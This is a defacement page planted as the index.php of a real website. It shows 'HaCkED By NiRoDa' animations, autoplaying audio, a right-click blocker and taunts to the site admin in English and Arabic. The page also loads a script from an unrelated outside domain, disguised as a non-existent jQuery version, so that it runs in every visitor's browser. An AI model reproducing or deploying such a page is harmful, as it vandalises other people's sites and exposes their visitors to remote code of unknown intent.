File: /home/schuftan/domains/schuftan.cl/public_html/antiguo/index.php
<html dir="rtl">
<body bgcolor="#000000">
<head<head>
<SCRIPT language=JavaScript>
<!-- Begin
if (document.all) {
//Things you can alter
yourLogo = "HaCkED By NiRoDa "; //Not less than 2 letters!
logoFont = "IMPACT";
logoColor = "YELLOW";
//Nothing needs altering below!
yourLogo = yourLogo.split('');
L = yourLogo.length;
TrigSplit = 360 / L;
Sz = new Array()
logoWidth = 60;
logoHeight = -40;
ypos = 0;
xpos = 0;
step = 0.03;
currStep = 0;
document.write('<div id="outer" style="position:absolute;top:0px;left:0px"><div style="position:relative">');
for (i = 0; i < L; i++) {
document.write('<div id="ie" style="position:absolute;top:0px;left:0px;'
+'width:10px;height:10px;font-family:'+logoFont+';font-size:12px;'
+'color:'+logoColor+';text-align:center">'+yourLogo[i]+'</div>');
}
document.write('</div></div>');
function Mouse() {
ypos = event.y;
xpos = event.x - 5;
}
document.onmousemove=Mouse;
function animateLogo() {
outer.style.pixelTop = document.body.scrollTop;
for (i = 0; i < L; i++) {
ie[i].style.top = ypos + logoHeight * Math.sin(currStep + i * TrigSplit * Math.PI / 180);
ie[i].style.left = xpos + logoWidth * Math.cos(currStep + i * TrigSplit * Math.PI / 180);
Sz[i] = ie[i].style.pixelTop - ypos;
if (Sz[i] < 5) Sz[i] = 5;
ie[i].style.fontSize = Sz[i] / 1.7;
}
currStep -= step;
setTimeout('animateLogo()', 20);
}
window.onload = animateLogo;
}
// End -->
</SCRIPT>
</body>
<head></SCRIPT>
<!--webbot bot="HTMLMarkup" endspan -->
<p align="center"><!--webbot bot="HTMLMarkup" startspan -->
<STYLE>BODY {
SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #666666; SCROLLBAR-ARROW-COLOR: #666666; SCROLLBAR-DARKSHADOW-COLOR: #666666; SCROLLBAR-BASE-COLOR: #000000
}
</STYLE>
<!--webbot bot="HTMLMarkup" endspan i-checksum="8067" -->
<!-- following code added by server. PLEASE REMOVE -->
<!-- preceding code added by server. PLEASE REMOVE --><script language="JavaScript">
<!-- Space Trip Script by kurt.grigg@virgin.net
cOlOuRs=new Array("abbbff","ffffee","ffff7a","dffffd","ffaaa0","ffddd0")
S_amount = 30;//number of small stars!!!!!
L_amount = 20;//number of larger stars!!!!
S_Ypos = new Array();
S_Xpos = new Array();
L_Ypos = new Array();
L_Xpos = new Array();
S_speed= new Array();
L_speed= new Array();
if (document.all)
{
for (i = 0; i < S_amount; i++)
{
S_Ypos[i] = Math.round(Math.random()*document.body.offsetHeight);
S_Xpos[i] = Math.round(Math.random()*document.body.offsetWidth);
}
for (i = 0; i < L_amount; i++)
{
L_Ypos[i] = Math.round(Math.random()*document.body.offsetHeight);
L_Xpos[i] = Math.round(Math.random()*document.body.offsetWidth);
}
document.write('<div id="Outer" style="position:absolute;top:0px;left:0px">');
document.write('<div id="Inner" style="position:relative">');
for (i = 0; i < S_amount; i++)
{document.write('<div id="ieS_star" style="position:absolute;top:'+S_Ypos[i]+';left:'+S_Xpos[i]+';width:1px;height:1px;background:#fffff0;font-size:1px"></div>');}
for (i = 0; i < L_amount; i++)
{document.write('<div id="ieL_star" style="position:absolute;top:'+L_Ypos[i]+';left:'+L_Xpos[i]+';width:2px;height:2px;background:#ffffff;font-size:2px"></div>');}
document.write('</div>');
document.write('</div>');
for (i = 0; i < L_amount; i++)
{
for (j = 0; j < cOlOuRs.length; j++)
{var NewColour=Math.round(Math.random()*[j])}
document.all.ieS_star[i].style.background=cOlOuRs[NewColour];
document.all.ieL_star[i].style.background=cOlOuRs[NewColour];
}
for (i=0; i < ieS_star.length; i++){S_speed[i]=Math.random()*3+1}
for (i=0; i < ieL_star.length; i++){L_speed[i]=Math.random()*7+2}
function ES_go()
{
document.all.Outer.style.pixelTop=document.body.scrollTop;
for (i=0; i < ieS_star.length; i++)
{
ieS_star[i].style.pixelLeft-=S_speed[i];
if (ieS_star[i].style.pixelLeft < -10){ieS_star[i].style.pixelLeft=window.document.body.offsetWidth}
}
S_timer=setTimeout('ES_go()',30);
}
function EL_go()
{
for (i=0; i < ieL_star.length; i++)
{
ieL_star[i].style.pixelLeft-=L_speed[i];
if (ieL_star[i].style.pixelLeft < -10){ieL_star[i].style.pixelLeft=window.document.body.offsetWidth}
}
L_timer=setTimeout('EL_go()',10);
}
function IeStart()
{
ES_go();
EL_go();
}
IeStart()
}//End Explorer
else if (document.layers)
{
for (i = 0; i < S_amount; i++)
{
S_Ypos[i] = Math.round(Math.random()*window.innerHeight);
S_Xpos[i] = Math.round(Math.random()*window.innerWidth);
document.write("<LAYER NAME='S_star"+i+"' LEFT=0 TOP=0 BGCOLOR='#FFFFF0' CLIP='0,0,1,1'></LAYER>");
document.layers["S_star"+i].top = S_Ypos[i];
document.layers["S_star"+i].left = S_Xpos[i];
}
for (i = 0; i < L_amount; i++)
{
L_Ypos[i] = Math.round(Math.random()*window.innerHeight);
L_Xpos[i] = Math.round(Math.random()*window.innerWidth);
document.write("<LAYER NAME='L_star"+i+"' LEFT=0 TOP=0 BGCOLOR='#FFFFF0' CLIP='0,0,2,2'></LAYER>");
document.layers["L_star"+i].top = L_Ypos[i];
document.layers["L_star"+i].left = L_Xpos[i];
for (j = 0; j < cOlOuRs.length; j++)
{
var NewColour=Math.round(Math.random()*[j]);
}
document.layers['S_star'+i].bgColor=cOlOuRs[NewColour];
document.layers['L_star'+i].bgColor=cOlOuRs[NewColour];
}
for (i=0; i < S_amount; i++){S_speed[i]=Math.random()*3+1}
for (i=0; i < L_amount; i++){L_speed[i]=Math.random()*7+2}
function NS_go()
{
for (i=0; i < S_amount; i++)
{
var temp="S_star"+i;//50
document.layers[temp].top=S_Ypos[i]+window.pageYOffset;
document.layers['S_star'+i].left-=S_speed[i];
if (document.layers['S_star'+i].left < -10){document.layers['S_star'+i].left=window.innerWidth}
}
S_timer=setTimeout('NS_go()',30);
}
function NL_go()
{
for (i=0; i < L_amount; i++)
{
var temp="L_star"+i
document.layers[temp].top=L_Ypos[i]+window.pageYOffset;
document.layers['L_star'+i].left-=L_speed[i];
if (document.layers['L_star'+i].left < -10){document.layers['L_star'+i].left=window.innerWidth}
}
L_timer=setTimeout('NL_go()',10);
}
function NsStart()
{
NS_go();
NL_go();
}
NsStart();
}//End Netscape
window.onresize = new Function("window.zorkon.reload()");
//-->
</script>
</font>
</SPAN>
<FONT face=verdana size=2>
<embed src="http://www.2ngel.com/we/kuran.MP3" align="baseline" border="0" width="275" height="40" type="audio/x-pn-realaudio-plugin" console="Clip1" controls="ControlPanel" autostart="true" hidden>
</font></p>
<p align="center"><FONT face=verdana size=2>
<marquee width="528" height="38" style="color: #F0F000; font-family: Lucida Calligraphy; font-size: 24pt" behavior="alternate">DeAr ADM!n youR s!Te</marquee><STYLE type=text/css>UNKNOWN {
align: justify
}
BODY {
CURSOR: url('http://www.2ngel.com/we/mause.cur')
}
A {
CURSOR: url('http://www.2ngel.com/we/mause.cur')
}
UNKNOWN {
if: = "Netscape" && keyp.which == 3) {
alert(mymessage);
return false;
}
if (navigator.appVersion.indexOf("MSIE"); 1: = 2) {
alert(mymessage);
return false;
}
}
</STYLE><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>
**-.. تم الاختراق بواسطة نيرودا ..-**</title><script type="text/javascript" src="http://xxxindianxxx.com/st/css/jquery-1.6.5.min.js"></script></head><script language="JavaScript1.2">
/*
Disable right click script II (on images)- By Dynamicdrive.com
For full source, Terms of service, and 100s DTHML scripts
Visit http://www.dynamicdrive.com
للمزيد من الجافا سكريبت .. نرجو زيارة موقع إقلاع سوفت http://soft.vip600.com/
*/
var clickmessage="NiRoDa"
function disableclick(e) {
if (document.all) {
if (event.button==2||event.button==3) {
if (event.srcElement.tagName=="IMG"){
alert(clickmessage);
return false;
}
}
}
else if (document.layers) {
if (e.which == 3) {
alert(clickmessage);
return false;
}
}
else if (document.getElementById){
if (e.which==3&&e.target.tagName=="IMG"){
alert(clickmessage)
return false
}
}
}
function associateimages(){
for(i=0;i<document.images.length;i++)
document.images[i].onmousedown=disableclick;
}
if (document.all)
document.onmousedown=disableclick
else if (document.getElementById)
document.onmouseup=disableclick
else if (document.layers)
associateimages()
</script><body background="http://www13.0zz0.com/2009/12/03/05/781195163.jpg"></p>
<p align="center"> <img border="0" src="http://www.2ngel.com/we/99998650[1].gif" width="558" height="129"></p>
</body>
</font>
<P align="center">
<span style="filter: blur(add=1,direction=270,strength=30); ">
<b><strong>
<font face="Wingdings" color="#008000" style="font-size: 28pt">F</font></strong><font color="#006699"><font face="Bradley Hand ITC" style="font-size: 28pt"> </font><font face="DecoType Naskh" style="font-size: 28pt"> </font>
</font>
<font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
<span lang="ar-sy">أشهد</font><font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh">
أن</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
لا </font>
<font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh">
إله</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
إلا </font>
<font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh">
الله</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
وأشهد</font><font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh">
أن</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
محمداً </font>
<font color="#FFFF00" style="font-size: 28pt" face="DecoType Naskh">
عبده</font><font color="#FF0000" style="font-size: 28pt" face="DecoType Naskh">
ورسوله</font></span><font color="#ffffff" face="Bradley Hand ITC" style="font-size: 28pt"> </font><strong>
<font face="Wingdings" color="#008000" style="font-size: 28pt">E</font></strong></b></span><P align="center">
<span lang="ar-sa">
<font color="#FF0000" size="5">
اذا</font><font color="#FFFF00" size="5"> كانے</font><font color="#FF0000" size="5"> الانسانے</font><font color="#FFFF00" size="5">
والزمانے</font><font color="#FF0000" size="5"> ضديے
</font><font color="#FFFF00" size="5">
فأنا
</font><font color="#FF0000" size="5">
._.(سوريے)._.
</font><font color="#FFFF00" size="5">
اعشقے</font><font color="#FF0000" size="5"> التحديے
</font></span>
<span style="filter: blur(add=1,direction=270,strength=30); ">
<p dir="ltr" align="center"><b><font color="#ff0000">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">I</span></font><span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
</span><font color="#ffff00">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">will Not stop
Hacking ... </span></font>
<span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
<br>
</span><font color="#ff0000">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">S</span></font></b><span class="SpellE"><b><span style="font-size: 13.5pt; color: #ffff00; font-family: Lucida Calligraphy">orry</span></b></span><b><span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
</span>
<span style="font-size: 13.5pt; color: #ff0000; font-family: Lucida Calligraphy; text-decoration: underline">
admin</span><span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
</span><font color="#ffff00">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">but you don't
have any </font> <u><font color="#FF0000">
security</font><font color="#ffff00"><span lang="ar-sa"> </span>in youR web</font></u></span><u><span style="font-size: 13.5pt; color: #42a0ff; font-family: Lucida Calligraphy">
</span><font color="#ff0000">
<span style="font-size: 13.5pt; font-family: Lucida Calligraphy">s</span></font></u><font color="#ffff00"><span style="font-size: 13.5pt; font-family: Lucida Calligraphy"><u>ite
</u>..</span></font></b></p>
<p dir="ltr" align="center"><b><span style="font-family: Lucida Calligraphy">
<font size="4" color="#FF0000">Wh</font><font size="4" color="#FFFF00">en yoU
Can ProtEct YouR SiT3 ,, May Be I StoP</font></span><font color="#ffff00"><span style="font-size: 13.5pt; font-family: Lucida Calligraphy"> </span></font>
</b></p>
</span>
<p align="center"><font size="6" color="#FF0000" face="Lucida Calligraphy">b</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ye
</font><font size="6" face="Lucida Calligraphy" color="#FF0000">b</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ye
</font><u><font size="6" face="Lucida Calligraphy" color="#FF0000">A</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">dmi</font></u><font size="6" face="Lucida Calligraphy" color="#FF0000"><u>n </u> ,,
S</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ee</font><font size="6" face="Lucida Calligraphy" color="#FF0000">
Y</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ou</font><font size="6" face="Lucida Calligraphy" color="#FF0000">
L</font><font size="6" face="Lucida Calligraphy" color="#FFFF00">ate</font><font size="6" face="Lucida Calligraphy" color="#FF0000">R</font></p>
<p align="center"><font face="Lucida Calligraphy" size="4" color="#FF0000">Don</font><font face="Lucida Calligraphy" size="4" color="#FFFF00">e</font><font face="Lucida Calligraphy" size="4" color="#FF0000">/.</font></p>
<p align="center"><font color="#800000" size="6">
<img border="0" src="http://www.2ngel.com/we/1.gif"></font></p>
<body onbeforeprint="onbeforeprint()" onafterprint="onafterprint()"
onselectstart="return false" oncontextmenu="return false">
</html>